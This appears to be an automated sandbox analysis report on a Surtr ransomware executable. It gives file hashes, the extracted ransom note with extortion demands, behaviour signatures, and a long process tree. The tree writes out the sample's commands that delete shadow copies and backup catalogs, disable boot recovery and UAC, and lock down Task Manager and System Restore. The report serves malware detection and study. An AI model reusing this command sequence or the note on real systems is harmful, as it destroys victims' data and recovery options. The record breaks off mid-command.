Analysis

  • max time kernel
    151s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-11-2022 03:34

General

  • Target

    32f9e35d861d166a7ae22eb24f50ab0fb1adedc9f1ae5f1ce2c76e3268b2b4c1.exe

  • Size

    1.1MB

  • MD5

    674e7ee905d24a89af47b53b53ffc23c

  • SHA1

    c6b73b882aa1f4d46ec655a5591a28638700856c

  • SHA256

    32f9e35d861d166a7ae22eb24f50ab0fb1adedc9f1ae5f1ce2c76e3268b2b4c1

  • SHA512

    6a0623742423f2137a0a9285e6a590659f8436eeb1fd7c9bcb5e16ecbffa949ae82cf59ee9a49e614345b559a581cfe23c87afce028d1927335dc4938a9b0408

  • SSDEEP

    24576:ibBzKGHF0bxTCFvXwKl/aISpu4Qc6F3v1HT2BzN2tgGS3YzYhoPGxFG4zmYw7A:wV4xTC4u4Qc6/F8bw4Nw

Malware Config

Extracted

Path

C:\ProgramData\Service\SURTR_README.hta

Family

surtr

Ransom Note
SurtrRansomware OOPS ALL YOUR IMPORTANT FILES HAVE BEEN ENCRYPTED AND STOLEN !! Notice : There is only one way to restore your data read the boxes carefully! Attention : Do Not change file names. Do Not try to decrypt using third party softwares , it may cause permanent data loss . your files will be sold on the Dark Web after 15 days. Imagine 1 million hackers have all your information including files, IP, name and number and location and ... Do not pay any money before decrypting the test files. You can use our 50% discount if you pay the fee within first 15 days of encryption . otherwise the price will be doubled. In order to warranty you , our team will decrypt 3 of your desired files for free.but you need to pay the specified price for the rest of the operation . How To Decrypt : Your system is offline . in order to contact us you can email this address [email protected] use this ID (okvd1x8i6h1pch) for the title of your email . If you weren't able to contact us within 24 hours please email : [email protected] If you didn't get any respond within 48 hours use this link (Not Available Now).send your ID and your cryptor name (SurtrRansomwareUserName) therefore we can create another way to contact you as soon as possible

Signatures

  • Deletes NTFS Change Journal 2 TTPs 1 IoCs

    The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.

  • Detects Surtr Payload 1 IoCs
  • Surtr

    Ransomware family first seen in late 2021.

  • UAC bypass 3 TTPs 1 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Disables use of System Restore points 1 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Interacts with shadow copies 2 TTPs 51 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\32f9e35d861d166a7ae22eb24f50ab0fb1adedc9f1ae5f1ce2c76e3268b2b4c1.exe
    "C:\Users\Admin\AppData\Local\Temp\32f9e35d861d166a7ae22eb24f50ab0fb1adedc9f1ae5f1ce2c76e3268b2b4c1.exe"
    1⤵
    • Checks computer location settings
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of WriteProcessMemory
    PID:4328
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c mkdir C:\ProgramData\Service
      2⤵
        PID:1244
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c @echo off
        2⤵
          PID:3400
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c chcp 437
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4220
          • C:\Windows\SysWOW64\chcp.com
            chcp 437
            3⤵
              PID:3428
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c mkdir "%TEMP%\Service"
            2⤵
              PID:3868
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:1484
              • C:\Windows\system32\vssadmin.exe
                vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
                3⤵
                • Interacts with shadow copies
                PID:1580
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:688
              • C:\Windows\system32\vssadmin.exe
                vssadmin.exe Delete Shadows /all /quiet
                3⤵
                • Interacts with shadow copies
                PID:2876
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
              2⤵
                PID:4940
                • C:\Windows\system32\vssadmin.exe
                  vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
                  3⤵
                  • Interacts with shadow copies
                  PID:3596
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:3248
                • C:\Windows\system32\bcdedit.exe
                  bcdedit /set {default} recoveryenabled No
                  3⤵
                  • Modifies boot configuration data using bcdedit
                  PID:1600
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:4352
                • C:\Windows\system32\vssadmin.exe
                  vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
                  3⤵
                  • Enumerates connected drives
                  • Interacts with shadow copies
                  PID:2508
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:3516
                • C:\Windows\system32\bcdedit.exe
                  bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
                  3⤵
                  • Modifies boot configuration data using bcdedit
                  PID:4588
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=unbounded
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:2304
                • C:\Windows\system32\vssadmin.exe
                  vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=unbounded
                  3⤵
                  • Enumerates connected drives
                  • Interacts with shadow copies
                  PID:528
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
                2⤵
                  PID:1632
                  • C:\Windows\system32\fsutil.exe
                    fsutil.exe usn deletejournal /D C:
                    3⤵
                    • Deletes NTFS Change Journal
                    PID:3068
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
                  2⤵
                    PID:2444
                    • C:\Windows\system32\wbadmin.exe
                      wbadmin.exe delete catalog -quiet
                      3⤵
                      • Deletes backup catalog
                      PID:2168
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
                    2⤵
                      PID:3500
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
                        3⤵
                        • Enumerates connected drives
                        • Interacts with shadow copies
                        PID:4256
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                      2⤵
                        PID:2736
                        • C:\Windows\system32\schtasks.exe
                          schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                          3⤵
                            PID:3576
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
                          2⤵
                            PID:4748
                            • C:\Windows\system32\vssadmin.exe
                              vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
                              3⤵
                              • Interacts with shadow copies
                              PID:4236
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
                            2⤵
                              PID:4916
                              • C:\Windows\system32\vssadmin.exe
                                vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
                                3⤵
                                • Interacts with shadow copies
                                PID:2812
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                              2⤵
                                PID:2216
                                • C:\Windows\system32\reg.exe
                                  reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                  3⤵
                                  • UAC bypass
                                  PID:3292
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=unbounded
                                2⤵
                                  PID:632
                                  • C:\Windows\system32\vssadmin.exe
                                    vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=unbounded
                                    3⤵
                                    • Interacts with shadow copies
                                    PID:1824
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
                                  2⤵
                                    PID:1672
                                    • C:\Windows\system32\vssadmin.exe
                                      vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
                                      3⤵
                                      • Enumerates connected drives
                                      • Interacts with shadow copies
                                      PID:2936
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
                                    2⤵
                                      PID:4868
                                      • C:\Windows\system32\reg.exe
                                        reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
                                        3⤵
                                          PID:4488
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=unbounded
                                        2⤵
                                          PID:1080
                                          • C:\Windows\system32\vssadmin.exe
                                            vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=unbounded
                                            3⤵
                                            • Interacts with shadow copies
                                            PID:4212
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                          2⤵
                                            PID:2340
                                            • C:\Windows\system32\reg.exe
                                              reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                              3⤵
                                                PID:4316
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
                                              2⤵
                                                PID:972
                                                • C:\Windows\system32\vssadmin.exe
                                                  vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
                                                  3⤵
                                                  • Interacts with shadow copies
                                                  PID:2384
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
                                                2⤵
                                                  PID:1008
                                                  • C:\Windows\system32\reg.exe
                                                    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
                                                    3⤵
                                                      PID:1172
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
                                                    2⤵
                                                      PID:2664
                                                      • C:\Windows\system32\reg.exe
                                                        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
                                                        3⤵
                                                          PID:2840
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=unbounded
                                                        2⤵
                                                          PID:3104
                                                          • C:\Windows\system32\vssadmin.exe
                                                            vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=unbounded
                                                            3⤵
                                                            • Enumerates connected drives
                                                            • Interacts with shadow copies
                                                            PID:1208
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
                                                          2⤵
                                                            PID:2844
                                                            • C:\Windows\system32\vssadmin.exe
                                                              vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
                                                              3⤵
                                                              • Enumerates connected drives
                                                              • Interacts with shadow copies
                                                              PID:2124
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
                                                            2⤵
                                                              PID:2232
                                                              • C:\Windows\system32\vssadmin.exe
                                                                vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
                                                                3⤵
                                                                • Interacts with shadow copies
                                                                PID:5820
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
                                                              2⤵
                                                                PID:2976
                                                                • C:\Windows\system32\reg.exe
                                                                  reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
                                                                  3⤵
                                                                    PID:3516
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=unbounded
                                                                  2⤵
                                                                    PID:3304
                                                                    • C:\Windows\system32\vssadmin.exe
                                                                      vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=unbounded
                                                                      3⤵
                                                                      • Interacts with shadow copies
                                                                      PID:1548
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
                                                                    2⤵
                                                                      PID:3008
                                                                      • C:\Windows\system32\reg.exe
                                                                        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
                                                                        3⤵
                                                                          PID:2180
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=unbounded
                                                                        2⤵
                                                                          PID:5096
                                                                          • C:\Windows\system32\vssadmin.exe
                                                                            vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=unbounded
                                                                            3⤵
                                                                            • Enumerates connected drives
                                                                            • Interacts with shadow copies
                                                                            PID:3776
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
                                                                          2⤵
                                                                            PID:1512
                                                                            • C:\Windows\system32\reg.exe
                                                                              reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
                                                                              3⤵
                                                                                PID:1792
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
                                                                              2⤵
                                                                                PID:2732
                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                  vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
                                                                                  3⤵
                                                                                  • Enumerates connected drives
                                                                                  • Interacts with shadow copies
                                                                                  PID:5264
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
                                                                                2⤵
                                                                                  PID:2452
                                                                                  • C:\Windows\system32\reg.exe
                                                                                    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
                                                                                    3⤵
                                                                                      PID:5020
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=unbounded
                                                                                    2⤵
                                                                                      PID:4296
                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                        vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=unbounded
                                                                                        3⤵
                                                                                        • Enumerates connected drives
                                                                                        • Interacts with shadow copies
                                                                                        PID:4280
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
                                                                                      2⤵
                                                                                        PID:776
                                                                                        • C:\Windows\system32\reg.exe
                                                                                          reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
                                                                                          3⤵
                                                                                            PID:5308
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
                                                                                          2⤵
                                                                                            PID:2112
                                                                                            • C:\Windows\system32\reg.exe
                                                                                              reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
                                                                                              3⤵
                                                                                                PID:2816
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
                                                                                              2⤵
                                                                                                PID:4868
                                                                                                • C:\Windows\system32\reg.exe
                                                                                                  reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
                                                                                                  3⤵
                                                                                                    PID:2968
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
                                                                                                  2⤵
                                                                                                    PID:3800
                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
                                                                                                      3⤵
                                                                                                        PID:5100
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
                                                                                                      2⤵
                                                                                                        PID:2032
                                                                                                        • C:\Windows\system32\vssadmin.exe
                                                                                                          vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
                                                                                                          3⤵
                                                                                                          • Interacts with shadow copies
                                                                                                          PID:384
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
                                                                                                        2⤵
                                                                                                          PID:4172
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
                                                                                                            3⤵
                                                                                                              PID:4448
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=unbounded
                                                                                                            2⤵
                                                                                                              PID:1836
                                                                                                              • C:\Windows\system32\vssadmin.exe
                                                                                                                vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=unbounded
                                                                                                                3⤵
                                                                                                                • Interacts with shadow copies
                                                                                                                PID:5944
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
                                                                                                              2⤵
                                                                                                                PID:3068
                                                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                                                  vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
                                                                                                                  3⤵
                                                                                                                  • Enumerates connected drives
                                                                                                                  • Interacts with shadow copies
                                                                                                                  PID:4460
                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
                                                                                                                2⤵
                                                                                                                  PID:4988
                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
                                                                                                                    3⤵
                                                                                                                      PID:1004
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
                                                                                                                    2⤵
                                                                                                                      PID:3984
                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                        reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
                                                                                                                        3⤵
                                                                                                                          PID:4492
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
                                                                                                                        2⤵
                                                                                                                          PID:5176
                                                                                                                          • C:\Windows\system32\vssadmin.exe
                                                                                                                            vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
                                                                                                                            3⤵
                                                                                                                            • Interacts with shadow copies
                                                                                                                            PID:632
                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
                                                                                                                          2⤵
                                                                                                                            PID:5168
                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                              reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
                                                                                                                              3⤵
                                                                                                                                PID:392
                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=unbounded
                                                                                                                              2⤵
                                                                                                                                PID:5160
                                                                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                                                                  vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=unbounded
                                                                                                                                  3⤵
                                                                                                                                  • Interacts with shadow copies
                                                                                                                                  PID:1136
                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
                                                                                                                                2⤵
                                                                                                                                  PID:5152
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
                                                                                                                                    3⤵
                                                                                                                                      PID:2384
                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
                                                                                                                                    2⤵
                                                                                                                                      PID:5280
                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                        reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
                                                                                                                                        3⤵
                                                                                                                                          PID:4940
                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
                                                                                                                                        2⤵
                                                                                                                                          PID:912
                                                                                                                                          • C:\Windows\system32\vssadmin.exe
                                                                                                                                            vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
                                                                                                                                            3⤵
                                                                                                                                            • Interacts with shadow copies
                                                                                                                                            PID:2596
                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
                                                                                                                                          2⤵
                                                                                                                                            PID:3076
                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                              reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
                                                                                                                                              3⤵
                                                                                                                                                PID:3972
                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=unbounded
                                                                                                                                              2⤵
                                                                                                                                                PID:4980
                                                                                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                                                                                  vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=unbounded
                                                                                                                                                  3⤵
                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                  • Interacts with shadow copies
                                                                                                                                                  PID:4180
                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=unbounded
                                                                                                                                                2⤵
                                                                                                                                                  PID:5500
                                                                                                                                                  • C:\Windows\system32\vssadmin.exe
                                                                                                                                                    vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=unbounded
                                                                                                                                                    3⤵
                                                                                                                                                    • Interacts with shadow copies
                                                                                                                                                    PID:4324
                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
                                                                                                                                                  2⤵
                                                                                                                                                    PID:5584
                                                                                                                                                    • C:\Windows\system32\vssadmin.exe
                                                                                                                                                      vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
                                                                                                                                                      3⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:3936
                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
                                                                                                                                                    2⤵
                                                                                                                                                      PID:5616
                                                                                                                                                      • C:\Windows\system32\reg.exe
